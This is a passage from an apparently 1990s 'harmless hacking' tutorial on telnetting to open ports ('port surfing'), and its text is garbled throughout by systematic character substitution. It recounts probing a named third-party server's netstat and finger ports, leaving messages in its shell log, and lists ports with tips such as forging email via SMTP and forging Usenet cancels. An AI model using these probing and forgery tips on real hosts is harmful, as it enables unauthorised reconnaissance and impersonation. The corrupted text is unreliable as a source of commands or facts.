/2E/MMAM TCP data 1ackets sent /2CBCBCCAB TCP data .&tes sent LA@2/ TCP data 1ackets retransmitted 22/MMC@B TCP data .&tes retransmitted BAC2/FF TCP (C+0onl& 1ackets sent /LC2 TCP 3indo3 1ro.es sent MA@ TCP ")!0onl& 1ackets sent AFCB/EL TCP =indo30 "1date0 onl& 1ackets sent @LFLCF TCP control 1ackets sent @ABELCAM TCP 1ackets recei9ed 2A@FF@B@ TCP 1ackets recei9ed in seHuence /F2FM/A@AB TCP .&tes recei9ed in seHuence 2L2CE TCP 1ackets 3it2 c2ecksum errors 2E@@EM TCP 1ackets 3ere du1licates 2@CL2LECA TCP .&tes 3ere du1licates @EMA TCP 1ackets 2ad some du1licate .&tes MF@2/M TCP .&tes 3ere 1artial du1licates 2@/E/LB TCP 1ackets 3ere out of order @/L/2CMBE2 TCP .&tes 3ere out of order /F/L TCP 1ackets 2ad data after 3indo3 ABLMM@ TCP .&tes 3ere after 3indo3 LACM TCP 1ackets for alread& closed connection FM/ TCP 1ackets 3ere 3indo3 1ro.es /CAMEMLF TCP 1ackets 2ad (C+s 222BLE TCP 1ackets 2ad du1licate (C+s / TCP 1acket (C+ed unsent data /2CC2EME@F TCP .&tes (C+ed /M/LML TCP 1ackets 2ad 3indo3 u1dates /@ TCP segments dro11ed due to P(=S MBLA/LA TCP segments 3ere 1redicted 1ure0 (C+s 2MC@@ELB TCP segments 3ere 1redicted 1ure0 data ACAEFAC TCP PC5 cac2e misses @CL 5ad "DP 2eader c2ecksums /E 5ad "DP data lengt2 fields 2@EE22E2 "DP PC5 cac2e misses *ulti,et 5uffer Statistics: @AA out of BCA .uffers in use: @C .uffers allocated to Data/C .uffers allocated to Packet HeadersBB .uffers allocated to Socket StructuresLE .uffers allocated to Protocol Control 5locks/B@ .uffers allocated to )outing Ta.le #ntries2 .uffers allocated to Socket ,ames and (ddressesMA .uffers allocated to +ernel ?ork0 Processes2 .uffers allocated to Interface (ddresses/ .uffer allocated to *ulticast (ddresses/ .uffer allocated to Timeout Call.acksB .uffers allocated to *emor& *anagement2 .uffers allocated to ,et3ork TTD Control 5locks// out of M@ 1age clusters in use// CU5s .orro3ed from V*S de9ice dri9ers 2 CU5s 3aiting to return to t2e V*S de9ice dri9ers /B2 +.&tes allocated to *ulti,et .uffers %MMR in use'22B +.&tes of allocated .uffer address s1ace %CR of maximu m'Connection closed .& foreign 2ostOslug P YBAZ 0P =2oa! =2at 3as all t2at:

=2at 3e did 3as telnet to 1ort /L 00 t2e netstat 1ort0 0 32ic2 on some com1uters runs a daemon t2at tells an&.od& 32o cares to dro1 in 7ust a.out e9er&t2ing a.out t2e connection made .& all t2e com1uters linked to t2e Internet t2roug2 t2is com1uterSo from t2is 3e learned t3o t2ings: /' !rande-nm-org is a 9er& .us& and im1ortant com1uter2' #9en a 9er& .us& and im1ortant com1uter can let t2e random 1ort surfer come and 1la&So m& lad& friend 3anted to tr& out anot2er 1ort- I suggested t2e finger 1ort8 num.er EF- So s2e ga9e t2e command: Oslug P YBAZ 0Ptelnet grande-nm-org EF Tr&ing /2F-/2/-/-2 --Connected to grande-nm-org#sca1e c2aracter is I [Z Ifinger :Sorr&8 could not find G?I,!#)G Connection closed .& foreign 2ostOslug P YBFZ 0Ptelnet grande-nm-org EF Tr&ing /2F-/2/-/-2 --Connected to grande-nm-org#sca1e c2aracter is I [Z I2el1 :Sorr&8 could not find GH#LPG Connection closed .& foreign 2ostOslug P YBFZ 0Ptelnet grande-nm-org EF Tr&ing /2F-/2/-/-2 --Connected to grande-nm-org#sca1e c2aracter is I [Z I: :Sorr&8 could not find G:G Connection closed .& foreign 2ostOslug P YBFZ 0Ptelnet grande-nm-org EF Tr&ing /2F-/2/-/-2 --Connected to grande-nm-org#sca1e c2aracter is I [Z Iman :Sorr&8 could not find G*(,G Connection closed .& foreign 2ostOslug P YBFZ 0P (t first t2is looks like 7ust a .unc2 of failed commands- 5ut actuall& t2is is 1rett& fascinating- T2e reason is t2at 1ort EF is8 under I#T? rules8 su11osed to run fingerd8 t2e finger daemon- So 32en s2e ga9e t2e command ;finger< and grande-nm-org said :Sorr&8 could not find G?I,!#)8< 3e kne3 t2is 1ort 3as not follo3ing I#T? rules,o3 on ma& com1uters t2e& don6t run t2e finger daemon at all- T2is is .ecause finger 2as so 1ro1erties t2at can .e used to gain total control of t2e com1uter t2at runs it5ut if finger is s2ut do3n8 and not2ing else is running on 1ort EF8 3e 3oudl get t2e ans3er: telnet: connect: Connection refused5ut instead 3e got connected and grande-nm-org 3as 3aiting for a command,o3 t2e normal t2ing a 1ort surfer does 32en running an unfmiliar daemon is to coax it into re9ealing 32at commands it uses- ;Hel18 < ;:< and ;man < often 3ork- 5ut it didn6t 2el1 us5ut e9en t2oug2 t2ese commands didn6t 2el1 us8 t2e& did tell us t2at t2e daemon is 1ro.a.l& somet2ing sensiti9e- If it 3ere a daemon t2at 3as meant for an&.od& and 2is .rot2er to use8 it 3ould 2a9e gi9en us instructionsSo 32at did 3e do next: =e decided to .e good Internet citi4ens and also sta& out of 7ail =e decided 3e6d .eter log off5ut t2ere 3as one 2ack 3e decided to do first: lea9e our mark on t2e s2ell log fileT2e s2ell log file kee1s a record of all o1erating s&stem commands made on a com1uter- T2e adminsitrator of an o.9iousl& im1ortant com1uter suc2 as grande-nm-org is 1ro.a.l& com1etent enoug2 to scan t2e records of 32at commands are gi9en .& 32om to 2is com1uter- #s1eciall& on

a 1ort im1ortant enoug2 to .e running a m&ster&8 non0 I#T? daemon- So e9er&t2ing 3e t&1es 32ile connected 3as sa9ed on a logSo m& friend giggled 3it2 glee and left a fe3 messages on 1ort EF .efore logging off- $28 dear8 I do .elie9e s2e6s 2ooked on 2acking- Hmmm8 it could .e a good 3a& to meet cute s&sadmins--So8 1ort surf6s u1! If &ou 3ant to surf8 2ere6s t2e .asics: /' !et logged on to a s2ell account- T2at6s an account 3it2 &our ISP t2at lets &ou gi9e "nix commands- $r 00 run Linux or some ot2er kind of "nix on &our PC and 2ook u1 to t2e Internet2' !i9e t2e command ;telnet O2ostname P O1ot num.er P ; 32ere O2ostna me P is t2e internet address of t2e com1uter &ou 3nat to 9isit and O1ort num.er P is 32ate9er looks 12un to &ou@' If &ou get t2e res1onse ;connected to O2ostna me P 8 < t2en surf6s u1! ?ollo3ing are some of m& fa9orite 1orts- It is legal and 2armless to 1a& t2em 9isits so long as &ou don6t figure out 2o3 to gain su1eruser status 32ile 1la&ing 3it2 t2em- Ho3e9er8 1lease note t2at if &ou do too muc2 1ort surfing from &our s2ell account8 &our s&sadmin ma& notice t2is in 2is or 2er s2ell log file- If 2e or s2e is 1re7udiced against 2acking 8 &ou ma& get kicked off &our ISP- So &ou ma& 3ant to ex1lain in ad9ance t2at &ou are merel& a 2armless 2acker looking to 2a9e a good time8 er8 um8 learn a.out "nix- De28 t2at sounds good--Port num.er Ser9ice =2& it6s 12un! E ec2o =2ate9er &ou t&1e in8 t2e 2ost re1eats .ack to &ou8 used for 1ing F discard De9/null 00 2o3 fast can &ou figure out t2is one: // s&stat Lots of info on users /@ da&time Time and date at com1uter6s location /L netstat Tremendous info on net3orks .ut rarel& used an& more /F c2argen Pours out a stream of (SCII c2aracters- "se [C to sto12/ ft1 Transfers files 22 ss2 secure s2ell login 00 encr&1ted tunnel 2@ telnet =2ere &ou log in if &ou don6t use ss2:' 2L sm1t ?orge email from 5ill-!atesK*icrosoft-org@E time Time @F rl1 )esource location M@ 32ois Info on 2osts and net3orks L@ domain ,ameser9er EC go12er $ut0 of0date info 2unter EF finger Lots of info on users AC 2tt1 =e. ser9er //C 1o1 Incoming email //F nnt1 "senet ne3s grou1s 00 forge 1osts8 cancels MM@ s2tt1 (not2er 3e. ser9er L/2 .iff *ail notification L/@ rlogin )emote login 32o )emote 32o and u1time L/M s2ell )emote command8 no 1ass3ord used! s&slog )emote s&stem logging 00 2o3 3e .ust 2ackers L2C route )outing information 1rotocol >>>>>>> >> > > > > > > > > > > > > > > > > > Pro1eller 2ead ti1: ,ote t2at in most cases an Internet 2ost 3ill use t2ese 1ort num.er assignments for t2ese ser9ices- *ore t2an one ser9ice ma& also .e assigned simultaneousl& to t2e same 1ort- T2is num.ering s&stem is 9oluntaril& offered .& t2e Internet #ngineering Task ?orce %I#T?'- T2at means t2at an Internet 2ost ma& use ot2er 1orts for t2ese ser9ices- #x1ect t2e unex1ected! If &ou 2a9e a co1& of Linux8 &ou can get t2e list of all t2e I#T? assignments of 1ort num.ers in t2e file /etc/ser9ices>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > To su.scri.e to t2e Ha11& Hacker list8 email 2ackerKtec2.roker-com 3it2 messge ;su.scri.e 22-< Send me confidential email %1lease8 no discussions of illegal acti9ities' use cmeinelKtec2.roker-com- Please direct flames to de9/nullKtec2.roker-com- Ha11& 2acking! Co1&rig2t /FFB Carol&n P- *einel- Dou ma& for3ard t2e !"ID# T$ %mostl&' H()*L#SS H(C+I,!

as long as &ou lea9e t2is notice at t2e end--